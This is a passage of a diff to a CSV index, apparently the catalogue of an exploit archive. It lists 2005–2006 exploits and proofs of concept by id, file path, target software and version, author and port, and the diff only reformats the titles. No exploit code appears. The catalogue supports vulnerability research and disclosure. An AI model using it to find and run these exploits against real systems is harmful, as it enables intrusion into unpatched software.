(bpjava-msvc) Remote Exploit (OS X)",2005-10-20,"Kevin Finisterre",osx,remote,13722 +1261,platforms/hp-ux/remote/1261.pm,"HP-UX <= 11.11 - lpd Remote Command Execution Exploit (Metasploit)",2005-10-19,"H D Moore",hp-ux,remote,515 +1262,platforms/windows/remote/1262.pm,"CA Unicenter 3.1 - CAM log_security() Stack Overflow Exploit (Metasploit)",2005-10-19,"H D Moore",windows,remote,4105 +1263,platforms/multiple/remote/1263.pl,"Veritas NetBackup <= 6.0 - (bpjava-msvc) Remote Exploit (linux)",2005-10-20,"Kevin Finisterre",multiple,remote,13722 +1264,platforms/windows/remote/1264.pl,"Veritas NetBackup <= 6.0 - (bpjava-msvc) Remote Exploit (Win32)",2005-10-20,"Kevin Finisterre",windows,remote,13722 +1265,platforms/osx/remote/1265.pl,"Veritas NetBackup <= 6.0 - (bpjava-msvc) Remote Exploit (OS X)",2005-10-20,"Kevin Finisterre",osx,remote,13722 1266,platforms/windows/dos/1266.py,"Ethereal 0.9.1 < 0.10.12 SLIMP3 - Remote Buffer Overflow PoC",2005-10-20,Sowhat,windows,dos,0 1267,platforms/linux/local/1267.c,"XMail 1.21 - (-t Command Line Option) Local Root Buffer Overflow Exploit",2005-10-20,qaaz,linux,local,0 -1268,platforms/multiple/dos/1268.pl,"Net Portal Dynamic System <= 5.0 (register users) Denial of Service",2005-10-21,DarkFig,multiple,dos,0 +1268,platforms/multiple/dos/1268.pl,"Net Portal Dynamic System <= 5.0 - (register users) Denial of Service",2005-10-21,DarkFig,multiple,dos,0 1269,platforms/windows/dos/1269.c,"Microsoft Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047)",2005-10-21,anonymous,windows,dos,0 1270,platforms/php/webapps/1270.php,"PHP-Nuke 7.8 - SQL Injection / Remote Command Execution Exploit",2005-10-23,rgod,php,webapps,0 1271,platforms/windows/dos/1271.c,"Microsoft Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047) (2)",2005-10-24,"Winny Thomas",windows,dos,0 1272,platforms/linux/remote/1272.c,"Snort <= 2.4.2 - Back Orifice Parsing Remote Buffer Overflow Exploit",2005-10-25,rd,linux,remote,0 -1273,platforms/php/webapps/1273.pl,"TClanPortal <= 1.1.3 (id) Remote SQL Injection Exploit",2005-10-26,Devil-00,php,webapps,0 +1273,platforms/php/webapps/1273.pl,"TClanPortal <= 1.1.3 - (id) Remote SQL Injection Exploit",2005-10-26,Devil-00,php,webapps,0 1274,platforms/hardware/dos/1274.c,"Hasbani-WindWeb/2.0 - HTTP GET Remote DoS",2005-10-27,Expanders,hardware,dos,0 -1276,platforms/windows/dos/1276.html,"Microsoft Internet Explorer 6.0 (mshtmled.dll) Denial of Service Exploit",2005-10-28,"Tom Ferris",windows,dos,0 +1276,platforms/windows/dos/1276.html,"Microsoft Internet Explorer 6.0 - (mshtmled.dll) Denial of Service Exploit",2005-10-28,"Tom Ferris",windows,dos,0 1277,platforms/windows/remote/1277.c,"Mirabilis ICQ 2003a Buffer Overflow Download Shellcoded Exploit",2005-10-29,ATmaCA,windows,remote,0 1278,platforms/php/webapps/1278.pl,"Subdreamer 2.2.1 - SQL Injection / Command Execution Exploit",2005-10-31,RusH,php,webapps,0 1279,platforms/windows/remote/1279.pm,"Snort <= 2.4.2 BackOrifice Remote Buffer Overflow Exploit (Metasploit)",2005-11-01,"Trirat Puttaraksa",windows,remote,0 -1280,platforms/php/webapps/1280.pl,"VuBB Forum RC1 (m) Remote SQL Injection Exploit",2005-11-02,Devil-00,php,webapps,0 +1280,platforms/php/webapps/1280.pl,"VuBB Forum RC1 - (m) Remote SQL Injection Exploit",2005-11-02,Devil-00,php,webapps,0 1281,platforms/windows/dos/1281.c,"Battle Carry <= .005 Socket Termination Denial of Service Exploit",2005-11-02,"Luigi Auriemma",windows,dos,0 1282,platforms/windows/dos/1282.c,"Blitzkrieg 2 <= 1.21 - (server/client) Denial of Service Exploit",2005-11-02,"Luigi Auriemma",windows,dos,0 1283,platforms/windows/dos/1283.c,"FlatFrag <= 0.3 - Buffer Overflow / Denial of Service Exploit",2005-11-02,"Luigi Auriemma",windows,dos,0 @@ -1079,9 +1079,9 @@ id,file,description,date,author,platform,type,port 1286,platforms/windows/dos/1286.c,"GO-Global Windows Clients <= 3.1.0.3270 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 1287,platforms/windows/dos/1287.c,"GO-Global Windows Server <= 3.1.0.3270 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 1288,platforms/linux/remote/1288.pl,"Lynx <= 2.8.6dev.13 - Remote Buffer Overflow Exploit (port bind)",2005-11-02,xwings,linux,remote,0 -1289,platforms/php/webapps/1289.php,"CuteNews <= 1.4.1 (shell inject) Remote Command Execution Exploit",2005-11-03,rgod,php,webapps,0 -1290,platforms/linux/remote/1290.pl,"gpsdrive <= 2.09 (friendsd2) Remote Format String Exploit (ppc)",2005-11-04,"Kevin Finisterre",linux,remote,0 -1291,platforms/linux/remote/1291.pl,"gpsdrive <= 2.09 (friendsd2) Remote Format String Exploit (x86)",2005-11-04,"Kevin Finisterre",linux,remote,0 +1289,platforms/php/webapps/1289.php,"CuteNews <= 1.4.1 - (shell inject) Remote Command Execution Exploit",2005-11-03,rgod,php,webapps,0 +1290,platforms/linux/remote/1290.pl,"gpsdrive <= 2.09 - (friendsd2) Remote Format String Exploit (ppc)",2005-11-04,"Kevin Finisterre",linux,remote,0 +1291,platforms/linux/remote/1291.pl,"gpsdrive <= 2.09 - (friendsd2) Remote Format String Exploit (x86)",2005-11-04,"Kevin Finisterre",linux,remote,0 1292,platforms/multiple/remote/1292.pm,"WzdFTPD <= 0.5.4 - (SITE) Remote Command Execution Exploit (Metasploit)",2005-11-04,"David Maciejak",multiple,remote,21 1295,platforms/linux/remote/1295.c,"linux-ftpd-ssl 0.17 - (MKD/CWD) Remote Root Exploit",2005-11-05,kingcope,linux,remote,21 1296,platforms/php/webapps/1296.txt,"ibProArcade 2.x module (vBulletin/IPB) Remote SQL Injection Exploit",2005-11-06,B~HFH,php,webapps,0 @@ -1098,30 +1098,30 @@ id,file,description,date,author,platform,type,port 1316,platforms/linux/local/1316.pl,"Veritas Storage Foundation 4.0 VCSI18N_LANG Local Overflow Exploit",2005-11-12,"Kevin Finisterre",linux,local,0 1317,platforms/php/webapps/1317.py,"Coppermine Photo Gallery <= 1.3.2 File Retrieval SQL Injection Exploit",2005-11-13,DiGiTAL_MiDWAY,php,webapps,0 1319,platforms/php/webapps/1319.php,"Unclassified NewsBoard 1.5.3 Patch 3 - Blind SQL Injection Exploit",2005-11-14,rgod,php,webapps,0 -1320,platforms/php/webapps/1320.txt,"Arki-DB 1.0 (catid) Remote SQL Injection Vulnerabilities",2005-11-14,Devil-00,php,webapps,0 -1321,platforms/php/webapps/1321.pl,"Cyphor 0.19 (show.php id) Remote SQL Injection Exploit",2005-11-14,"HACKERS PAL",php,webapps,0 -1322,platforms/php/webapps/1322.pl,"Wizz Forum 1.20 (TopicID) Remote SQL Injection Exploit",2005-11-14,"HACKERS PAL",php,webapps,0 -1324,platforms/php/webapps/1324.php,"PHPWebThings <= 1.4 (msg/forum) SQL Injection Exploit",2005-11-16,rgod,php,webapps,0 -1325,platforms/php/webapps/1325.pl,"PHPWebThings <= 1.4 (forum) SQL Injection Exploit",2005-11-16,AhLam,php,webapps,0 +1320,platforms/php/webapps/1320.txt,"Arki-DB 1.0 - (catid) Remote SQL Injection Vulnerabilities",2005-11-14,Devil-00,php,webapps,0 +1321,platforms/php/webapps/1321.pl,"Cyphor 0.19 - (show.php id) Remote SQL Injection Exploit",2005-11-14,"HACKERS PAL",php,webapps,0 +1322,platforms/php/webapps/1322.pl,"Wizz Forum 1.20 - (TopicID) Remote SQL Injection Exploit",2005-11-14,"HACKERS PAL",php,webapps,0 +1324,platforms/php/webapps/1324.php,"PHPWebThings <= 1.4 - (msg/forum) SQL Injection Exploit",2005-11-16,rgod,php,webapps,0 +1325,platforms/php/webapps/1325.pl,"PHPWebThings <= 1.4 - (forum) SQL Injection Exploit",2005-11-16,AhLam,php,webapps,0 1326,platforms/php/webapps/1326.pl,"PHP-Nuke <= 7.8 - Search Module Remote SQL Injection Exploit",2005-11-16,anonymous,php,webapps,0 -1327,platforms/windows/dos/1327.pl,"FTGate4 Groupware Mail Server 4.1 (imapd) Remote Buffer Overflow PoC",2005-11-16,"Luca Ercoli",windows,dos,0 +1327,platforms/windows/dos/1327.pl,"FTGate4 Groupware Mail Server 4.1 - (imapd) Remote Buffer Overflow PoC",2005-11-16,"Luca Ercoli",windows,dos,0 1328,platforms/windows/dos/1328.c,"Microsoft Windows 2000 - UPNP (getdevicelist) Memory Leak DoS Exploit",2005-11-16,"Winny Thomas",windows,dos,0 -1329,platforms/php/webapps/1329.php,"EkinBoard 1.0.3 (config.php) SQL Injection / Command Execution Exploit",2005-11-17,rgod,php,webapps,0 -1330,platforms/windows/remote/1330.c,"FreeFTPD <= 1.0.8 (USER) Remote Buffer Overflow Exploit",2005-11-17,Expanders,windows,remote,21 -1331,platforms/multiple/dos/1331.c,"Macromedia Flash Plugin <= 7.0.19.0 (Action) Denial of Service Exploit",2005-11-18,BassReFLeX,multiple,dos,0 -1332,platforms/windows/remote/1332.pm,"MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit",2005-11-20,y0,windows,remote,143 -1333,platforms/hardware/remote/1333.pm,"Google Search Appliance proxystylesheet XSLT Java Code Execution",2005-11-20,"H D Moore",hardware,remote,80 +1329,platforms/php/webapps/1329.php,"EkinBoard 1.0.3 - (config.php) SQL Injection / Command Execution Exploit",2005-11-17,rgod,php,webapps,0 +1330,platforms/windows/remote/1330.c,"FreeFTPD <= 1.0.8 - (USER) Remote Buffer Overflow Exploit",2005-11-17,Expanders,windows,remote,21 +1331,platforms/multiple/dos/1331.c,"Macromedia Flash Plugin <= 7.0.19.0 - (Action) Denial of Service Exploit",2005-11-18,BassReFLeX,multiple,dos,0 +1332,platforms/windows/remote/1332.pm,"MailEnable 1.54 Pro - Universal IMAPD W3C Logging BoF Exploit",2005-11-20,y0,windows,remote,143 +1333,platforms/hardware/remote/1333.pm,"Google Search Appliance - proxystylesheet XSLT Java Code Execution",2005-11-20,"H D Moore",hardware,remote,80 1336,platforms/windows/dos/1336.cpp,"FileZilla Server Terminal 0.9.4d - Buffer Overflow PoC",2005-11-21,"Inge Henriksen",windows,dos,0 1337,platforms/php/webapps/1337.php,"Mambo <= 4.5.2 Globals Overwrite / Remote Command Exection Exploit",2005-11-22,rgod,php,webapps,0 1338,platforms/hardware/dos/1338.pl,"Cisco PIX Spoofed TCP SYN Packets Remote Denial of Service Exploit",2005-11-23,"Janis Vizulis",hardware,dos,0 -1339,platforms/windows/dos/1339.c,"FreeFTPD <= 1.0.10 (PORT Command) Denial of Service Exploit",2005-11-24,"Stefan Lochbihler",windows,dos,0 +1339,platforms/windows/dos/1339.c,"FreeFTPD <= 1.0.10 - (PORT Command) Denial of Service Exploit",2005-11-24,"Stefan Lochbihler",windows,dos,0 1340,platforms/php/webapps/1340.php,"eFiction <= 2.0 Fake GIF Shell Upload Exploit",2005-11-25,rgod,php,webapps,0 1341,platforms/windows/dos/1341.c,"Microsoft Windows MSDTC Service Remote Memory Modification PoC (MS05-051)",2005-11-27,darkeagle,windows,dos,0 -1342,platforms/php/webapps/1342.php,"Guppy <= 4.5.9 (REMOTE_ADDR) Remote Commands Execution Exploit",2005-11-28,rgod,php,webapps,0 +1342,platforms/php/webapps/1342.php,"Guppy <= 4.5.9 - (REMOTE_ADDR) Remote Commands Execution Exploit",2005-11-28,rgod,php,webapps,0 1343,platforms/windows/dos/1343.c,"Microsoft Windows Metafile (gdi32.dll) Denial of Service Exploit (MS05-053)",2005-11-29,"Winny Thomas",windows,dos,0 1345,platforms/php/dos/1345.php,"Xaraya <= 1.0.0 RC4 - create() Denial of Service Exploit",2005-11-29,rgod,php,dos,0 1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile - (mtNoObjects) Denial of Service Exploit (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0 -1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (phgrafx) Local Buffer Overflow Exploit (x86)",2005-11-30,"p. minervini",qnx,local,0 +1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 - (phgrafx) Local Buffer Overflow Exploit (x86)",2005-11-30,"p. minervini",qnx,local,0 1352,platforms/windows/remote/1352.cpp,"Microsoft Windows DTC Remote Exploit (PoC) (MS05-051) (updated)",2005-12-01,Swan,windows,remote,0 1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple PreAuth Remote Stack Overflow PoC",2005-12-02,Sowhat,windows,dos,0 1354,platforms/php/webapps/1354.php,"Zen Cart <= 1.2.6d (password_forgotten.php) SQL Injection Exploit",2005-12-02,rgod,php,webapps,0 @@ -1130,19 +1130,19 @@ id,file,description,date,author,platform,type,port 1357,platforms/windows/remote/1357.diff,"WIDCOMM Bluetooth Software < 3.0 - Remote Buffer Overflow Exploit",2005-12-04,"Kevin Finisterre",windows,remote,0 1358,platforms/php/webapps/1358.php,"SimpleBBS <= 1.1 - Remote Commands Execution Exploit",2005-12-06,rgod,php,webapps,0 1359,platforms/php/webapps/1359.php,"SugarSuite Open Source <= 4.0beta Remote Code Execution Exploit",2005-12-07,rgod,php,webapps,0 -1360,platforms/solaris/local/1360.c,"Appfluent Database IDS < 2.1.0.103 (Env Variable) Local Exploit",2005-12-07,c0ntex,solaris,local,0 +1360,platforms/solaris/local/1360.c,"Appfluent Database IDS < 2.1.0.103 - (Env Variable) Local Exploit",2005-12-07,c0ntex,solaris,local,0 1361,platforms/php/webapps/1361.c,"SimpleBBS <= 1.1 - Remote Commands Execution Exploit (C)",2005-12-07,unitedasia,php,webapps,0 -1362,platforms/windows/dos/1362.html,"Mozilla Firefox <= 1.5 (history.dat) Looping PoC",2005-12-07,ZIPLOCK,windows,dos,0 +1362,platforms/windows/dos/1362.html,"Mozilla Firefox <= 1.5 - (history.dat) Looping PoC",2005-12-07,ZIPLOCK,windows,dos,0 1363,platforms/php/webapps/1363.php,"Website Baker <= 2.6.0 Login Bypass / Remote Code Execution Exploit",2005-12-08,rgod,php,webapps,0 1364,platforms/php/webapps/1364.c,"SugarSuite Open Source <= 4.0beta - Remote Code Execution Exploit",2005-12-08,pointslash,php,webapps,0 1365,platforms/windows/remote/1365.pm,"Oracle 9.2.0.1 - Universal XDB HTTP Pass Overflow Exploit",2005-12-08,y0,windows,remote,8080 -1366,platforms/windows/remote/1366.pm,"Lyris ListManager Read Message Attachment SQL Injection Exploit",2005-12-09,"H D Moore",windows,remote,0 +1366,platforms/windows/remote/1366.pm,"Lyris ListManager - Read Message Attachment SQL Injection Exploit",2005-12-09,"H D Moore",windows,remote,0 1367,platforms/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution Exploit",2005-12-10,rgod,php,webapps,0 1368,platforms/windows/dos/1368.cpp,"Counter Strike 2D <= 0.1.0.1 - Denial of Service",2005-12-11,"Iman Karim",windows,dos,0 1369,platforms/multiple/remote/1369.html,"Mozilla Firefox <= 1.04 compareTo() Remote Code Execution Exploit",2005-12-12,"Aviv Raff",multiple,remote,0 -1370,platforms/php/webapps/1370.php,"phpCOIN 1.2.2 (phpcoinsessid) SQL Inj / Remote Code Execution Exploit",2005-12-12,rgod,php,webapps,0 +1370,platforms/php/webapps/1370.php,"phpCOIN 1.2.2 - (phpcoinsessid) SQL Inj / Remote Code Execution Exploit",2005-12-12,rgod,php,webapps,0 1371,platforms/windows/dos/1371.c,"Macromedia Flash Media Server 2 - Remote Denial of Service Exploit",2005-12-14,Kozan,windows,dos,0 -1372,platforms/windows/dos/1372.html,"Microsoft Internet Explorer 6.0 (pre tag Multiple single tags) Denial of Service",2005-12-14,"Markus Heer",windows,dos,0 +1372,platforms/windows/dos/1372.html,"Microsoft Internet Explorer 6.0 - (pre tag Multiple single tags) Denial of Service",2005-12-14,"Markus Heer",windows,dos,0 1373,platforms/php/webapps/1373.php,"Limbo <= 1.0.4.2 - _SERVER[REMOTE_ADDR] Overwrite Remote Exploit",2005-12-14,rgod,php,webapps,0 1374,platforms/windows/remote/1374.pl,"Watchfire AppScan QA 5.0.x - Remote Code Execution Exploit PoC",2005-12-15,"Mariano Nuñez",windows,remote,0 1375,platforms/windows/remote/1375.pl,"Mercury Mail Transport System 4.01b Remote Exploit (PH SERVER)",2005-12-16,kingcope,windows,remote,105 @@ -1154,72 +1154,72 @@ id,file,description,date,author,platform,type,port 1381,platforms/windows/remote/1381.pm,"Golden FTP Server <= 1.92 - (APPE) Remote Overflow Exploit (Metasploit)",2005-12-20,redsand,windows,remote,21 1382,platforms/php/webapps/1382.pl,"phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (updated)",2006-02-20,DarkFig,php,webapps,0 1383,platforms/php/webapps/1383.txt,"phpBB <= 2.0.18 - Remote XSS Cookie Disclosure Exploit",2005-12-21,jet,php,webapps,0 -1385,platforms/php/webapps/1385.pl,"PHP-Fusion 6.00.3 (rating) Parameter Remote SQL Injection Exploit",2005-12-23,krasza,php,webapps,0 -1387,platforms/php/webapps/1387.php,"Dev Web Management System <= 1.5 (cat) Remote SQL Injection Exploit",2005-12-24,rgod,php,webapps,0 -1388,platforms/php/webapps/1388.pl,"phpBB <= 2.0.17 (signature_bbcode_uid) Remote Command Exploit",2005-12-24,RusH,php,webapps,0 +1385,platforms/php/webapps/1385.pl,"PHP-Fusion 6.00.3 - (rating) Parameter Remote SQL Injection Exploit",2005-12-23,krasza,php,webapps,0 +1387,platforms/php/webapps/1387.php,"Dev Web Management System <= 1.5 - (cat) Remote SQL Injection Exploit",2005-12-24,rgod,php,webapps,0 +1388,platforms/php/webapps/1388.pl,"phpBB <= 2.0.17 - (signature_bbcode_uid) Remote Command Exploit",2005-12-24,RusH,php,webapps,0 1389,platforms/windows/dos/1389.html,"Microsoft Internet Explorer 6.0 - (mshtml.dll datasrc) Denial of Service",2005-12-27,BuHa,windows,dos,0 -1390,platforms/multiple/dos/1390.c,"BZFlag <= 2.0.4 (undelimited string) Denial of Service Exploit",2005-12-27,"Luigi Auriemma",multiple,dos,0 -1391,platforms/windows/remote/1391.pm,"Windows XP/2003 Metafile Escape() Code Execution Exploit (Metasploit)",2005-12-27,"H D Moore",windows,remote,0 -1394,platforms/windows/dos/1394.html,"Microsoft Internet Explorer 6.0 (mshtml.dll div) Denial of Service Exploit",2005-12-29,rgod,windows,dos,0 +1390,platforms/multiple/dos/1390.c,"BZFlag <= 2.0.4 - (undelimited string) Denial of Service Exploit",2005-12-27,"Luigi Auriemma",multiple,dos,0 +1391,platforms/windows/remote/1391.pm,"Windows XP/2003 - Metafile Escape() Code Execution Exploit (Metasploit)",2005-12-27,"H D Moore",windows,remote,0 +1394,platforms/windows/dos/1394.html,"Microsoft Internet Explorer 6.0 - (mshtml.dll div) Denial of Service Exploit",2005-12-29,rgod,windows,dos,0 1395,platforms/php/webapps/1395.php,"phpDocumentor <= 1.3.0 rc4 - Remote Commands Execution Exploit",2005-12-29,rgod,php,webapps,0 1396,platforms/windows/dos/1396.cpp,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (cpp)",2005-12-29,Lympex,windows,dos,0 1397,platforms/linux/local/1397.c,"Linux Kernel <= 2.6.9 / <= 2.6.11 (RHEL4) - 'k-rad3.c' (CPL 0) Local Root Exploit",2005-12-30,alert7,linux,local,0 1398,platforms/php/webapps/1398.pl,"CubeCart <= 3.0.6 - Remote Command Execution Exploit",2005-12-30,cijfer,php,webapps,0 1399,platforms/asp/webapps/1399.txt,"WebWiz Products 1.0 / <= 3.06 - Login Bypass SQL Injection Exploits",2005-12-30,DevilBox,asp,webapps,0 -1400,platforms/php/webapps/1400.pl,"CuteNews <= 1.4.1 (categories.mdu) Remote Command Execution Exploit",2006-01-01,cijfer,php,webapps,0 +1400,platforms/php/webapps/1400.pl,"CuteNews <= 1.4.1 - (categories.mdu) Remote Command Execution Exploit",2006-01-01,cijfer,php,webapps,0 1401,platforms/php/webapps/1401.pl,"Valdersoft Shopping Cart <= 3.0 - Remote Command Execution Exploit",2006-01-03,cijfer,php,webapps,0 1402,platforms/sco/local/1402.c,"SCO Openserver 5.0.7 - (termsh) Local Privilege Escalation Exploit",2006-01-03,prdelka,sco,local,0 1403,platforms/windows/local/1403.c,"WinRAR 3.30 - Long Filename Buffer Overflow Exploit (1)",2006-01-04,K4P0,windows,local,0 1404,platforms/windows/local/1404.c,"WinRAR 3.30 - Long Filename Buffer Overflow Exploit (2)",2006-01-04,c0d3r,windows,local,0 -1405,platforms/php/webapps/1405.pl,"FlatCMS <= 1.01 (file_editor.php) Remote Command Execution Exploit",2006-01-04,cijfer,php,webapps,0 -1406,platforms/windows/local/1406.php,"PHP <= 4.4.0 (mysql_connect function) Local Buffer Overflow Exploit",2006-01-05,mercenary,windows,local,0 +1405,platforms/php/webapps/1405.pl,"FlatCMS <= 1.01 - (file_editor.php) Remote Command Execution Exploit",2006-01-04,cijfer,php,webapps,0 +1406,platforms/windows/local/1406.php,"PHP <= 4.4.0 - (mysql_connect function) Local Buffer Overflow Exploit",2006-01-05,mercenary,windows,local,0 1407,platforms/windows/local/1407.c,"Microsoft Windows 2000 - Kernel APC Data-Free Local Escalation Exploit (MS05-055)",2006-01-05,SoBeIt,windows,local,0 1408,platforms/windows/remote/1408.pl,"BlueCoat WinProxy 6.0 R1c (Host) Remote Stack/SEH Overflow Exploit",2006-01-07,FistFuXXer,windows,remote,80 1409,platforms/windows/dos/1409.pl,"BlueCoat WinProxy <= 6.0 R1c (GET Request) Denial of Service Exploit",2006-01-07,FistFuXXer,windows,dos,0 1410,platforms/php/webapps/1410.pl,"Magic News Plus <= 1.0.3 Admin Pass Change Exploit",2006-01-09,cijfer,php,webapps,0 -1411,platforms/hardware/dos/1411.pl,"Cisco IP Phone 7940 (Reboot) Denial of Service Exploit",2006-01-10,kokanin,hardware,dos,0 -1412,platforms/linux/local/1412.rb,"Xmame 0.102 (-lang) Local Buffer Overflow Exploit",2006-01-10,xwings,linux,local,0 -1413,platforms/windows/remote/1413.c,"eStara Softphone <= 3.0.1.46 (SIP) Remote Buffer Overflow Exploit",2006-01-12,ZwelL,windows,remote,0 -1414,platforms/windows/remote/1414.pl,"eStara Softphone <= 3.0.1.46 (SIP) Remote Buffer Overflow Exploit (2)",2006-01-12,kokanin,windows,remote,5060 +1411,platforms/hardware/dos/1411.pl,"Cisco IP Phone 7940 - (Reboot) Denial of Service Exploit",2006-01-10,kokanin,hardware,dos,0 +1412,platforms/linux/local/1412.rb,"Xmame 0.102 - (-lang) Local Buffer Overflow Exploit",2006-01-10,xwings,linux,local,0 +1413,platforms/windows/remote/1413.c,"eStara Softphone <= 3.0.1.46 - (SIP) Remote Buffer Overflow Exploit",2006-01-12,ZwelL,windows,remote,0 +1414,platforms/windows/remote/1414.pl,"eStara Softphone <= 3.0.1.46 - (SIP) Remote Buffer Overflow Exploit (2)",2006-01-12,kokanin,windows,remote,5060 1415,platforms/linux/local/1415.c,"Xmame 0.102 - (lang) Local Buffer Overflow Exploit (C)",2006-01-13,Qnix,linux,local,0 -1416,platforms/windows/dos/1416.c,"HomeFtp 1.1 (NLST) Denial of Service",2006-01-14,pi3ch,windows,dos,0 -1417,platforms/windows/remote/1417.pl,"Farmers WIFE 4.4 sp1 (FTP) Remote System Access Exploit",2006-01-14,kokanin,windows,remote,22003 +1416,platforms/windows/dos/1416.c,"HomeFtp 1.1 - (NLST) Denial of Service",2006-01-14,pi3ch,windows,dos,0 +1417,platforms/windows/remote/1417.pl,"Farmers WIFE 4.4 sp1 - (FTP) Remote System Access Exploit",2006-01-14,kokanin,windows,remote,22003 1418,platforms/asp/webapps/1418.txt,"MiniNuke <= 1.8.2 - Multiple SQL Injection Vulnerabilities",2006-01-14,nukedx,asp,webapps,0 -1419,platforms/asp/webapps/1419.pl,"MiniNuke <= 1.8.2 (news.asp hid) SQL Injection Exploit",2006-01-14,DetMyl,asp,webapps,0 +1419,platforms/asp/webapps/1419.pl,"MiniNuke <= 1.8.2 - (news.asp hid) SQL Injection Exploit",2006-01-14,DetMyl,asp,webapps,0 1420,platforms/windows/remote/1420.c,"Microsoft Windows Metafile (WMF) Remote File Download Exploit Generator",2006-01-15,darkeagle,windows,remote,0 1421,platforms/windows/remote/1421.cpp,"Veritas NetBackup 4/5 Volume Manager Daemon Remote BoF Exploit",2006-01-16,"Patrick Thomassen",windows,remote,13701 1422,platforms/windows/dos/1422.c,"Cerberus FTP Server <= 2.32 - Denial of Service Exploit",2006-01-16,pi3ch,windows,dos,0 1423,platforms/windows/dos/1423.html,"Microsoft Internet Explorer <= 6.x - (IMG / XML elements) Denial of Service",2006-01-18,"Inge Henriksen",windows,dos,0 1424,platforms/windows/dos/1424.pl,"Tftpd32 2.81 - (GET Request) Format String Denial of Service PoC",2006-01-19,"Critical Security",windows,dos,0 -1425,platforms/linux/local/1425.c,"Xmame <= 0.102 (-pb/-lang/-rec) Local Buffer Overflow Exploit",2006-01-21,sj,linux,local,0 -1442,platforms/php/webapps/1442.pl,"ezDatabase <= 2.0 (db_id) Remote Command Execution Exploit",2006-01-22,cijfer,php,webapps,0 +1425,platforms/linux/local/1425.c,"Xmame <= 0.102 - (-pb/-lang/-rec) Local Buffer Overflow Exploit",2006-01-21,sj,linux,local,0 +1442,platforms/php/webapps/1442.pl,"ezDatabase <= 2.0 - (db_id) Remote Command Execution Exploit",2006-01-22,cijfer,php,webapps,0 1445,platforms/linux/local/1445.c,"Eterm LibAST < 0.7 - (-X Option) Local Privilege Escalation Exploit",2006-01-24,"Johnny Mast",linux,local,0 -1446,platforms/php/webapps/1446.pl,"creLoaded <= 6.15 (HTMLAREA) Automated Perl Exploit",2006-01-24,kaneda,php,webapps,0 +1446,platforms/php/webapps/1446.pl,"creLoaded <= 6.15 - (HTMLAREA) Automated Perl Exploit",2006-01-24,kaneda,php,webapps,0 1447,platforms/hardware/dos/1447.c,"Cisco Aironet Wireless Access Points Memory Exhaustion ARP Attack DoS",2006-01-25,Pasv,hardware,dos,0 1448,platforms/windows/remote/1448.pl,"Sami FTP Server 2.0.1 - Remote Stack Based Buffer Overflow PoC",2006-01-25,"Critical Security",windows,remote,0 1449,platforms/linux/local/1449.c,"SquirrelMail 3.1 Change Passwd Plugin Local Buffer Overflow Exploit",2006-01-25,"rod hedor",linux,local,0 1452,platforms/windows/remote/1452.pm,"Sami FTP Server 2.0.1 - Remote Buffer Overflow Exploit (Metasploit)",2006-01-25,redsand,windows,remote,21 -1453,platforms/php/webapps/1453.pl,"Phpclanwebsite 1.23.1 (par) Remote SQL Injection Exploit",2006-01-25,matrix_killer,php,webapps,0 +1453,platforms/php/webapps/1453.pl,"Phpclanwebsite 1.23.1 - (par) Remote SQL Injection Exploit",2006-01-25,matrix_killer,php,webapps,0 1455,platforms/windows/local/1455.txt,"Oracle Database Server 9i/10g (XML) Buffer Overflow Exploit",2006-01-26,Argeniss,windows,local,0 1456,platforms/linux/remote/1456.c,"SHOUTcast <= 1.9.4 File Request Format String Exploit (Leaked)",2006-01-28,crash-x,linux,remote,8000 1457,platforms/php/webapps/1457.txt,"phpBB <= 2.0.19 - XSS Remote Cookie Disclosure Exploit",2006-01-29,threesixthousan,php,webapps,0 1458,platforms/windows/remote/1458.cpp,"Winamp <= 5.12 - (.pls) Remote Buffer Overflow Exploit (0Day)",2006-01-29,ATmaCA,windows,remote,0 -1459,platforms/php/webapps/1459.pl,"xeCMS 1.0.0 RC 2 (cookie) Remote Command Execution Exploit",2006-01-30,cijfer,php,webapps,0 +1459,platforms/php/webapps/1459.pl,"xeCMS 1.0.0 RC 2 - (cookie) Remote Command Execution Exploit",2006-01-30,cijfer,php,webapps,0 1460,platforms/windows/remote/1460.pm,"Winamp <= 5.12 - (.pls) Remote Buffer Overflow Exploit (Metasploit)",2006-01-31,"H D Moore",windows,remote,0 1461,platforms/php/webapps/1461.pl,"Invision Power Board Dragoran Portal Mod <= 1.3 - SQL Injection Exploit",2006-01-31,SkOd,php,webapps,0 1462,platforms/windows/remote/1462.cpp,"Sami FTP Server 2.0.1 - Remote Buffer Overflow Exploit (cpp)",2006-01-31,HolyGhost,windows,remote,21 -1463,platforms/windows/remote/1463.pm,"SoftiaCom WMailserver 1.0 SMTP Remote Buffer Overflow Exploit (Metasploit)",2006-02-01,y0,windows,remote,21 -1464,platforms/hardware/dos/1464.c,"Arescom NetDSL-1000 (telnetd) Remote Denial of Service Exploit",2006-02-02,"Fabian Ramirez",hardware,dos,0 +1463,platforms/windows/remote/1463.pm,"SoftiaCom WMailserver 1.0 - SMTP Remote Buffer Overflow Exploit (Metasploit)",2006-02-01,y0,windows,remote,21 +1464,platforms/hardware/dos/1464.c,"Arescom NetDSL-1000 - (telnetd) Remote Denial of Service Exploit",2006-02-02,"Fabian Ramirez",hardware,dos,0 1465,platforms/windows/local/1465.c,"Microsoft Windows - ACLs Local Privilege Escalation Exploit (Updated)",2006-02-12,"Andres Tarasco",windows,local,0 -1466,platforms/windows/remote/1466.pl,"eXchange POP3 5.0.050203 (rcpt to) Remote Buffer Overflow Exploit",2006-02-03,"securma massine",windows,remote,25 -1467,platforms/php/webapps/1467.php,"LoudBlog <= 0.4 (path) Arbitrary Remote Inclusion Exploit",2006-02-03,rgod,php,webapps,0 +1466,platforms/windows/remote/1466.pl,"eXchange POP3 5.0.050203 - (rcpt to) Remote Buffer Overflow Exploit",2006-02-03,"securma massine",windows,remote,25 +1467,platforms/php/webapps/1467.php,"LoudBlog <= 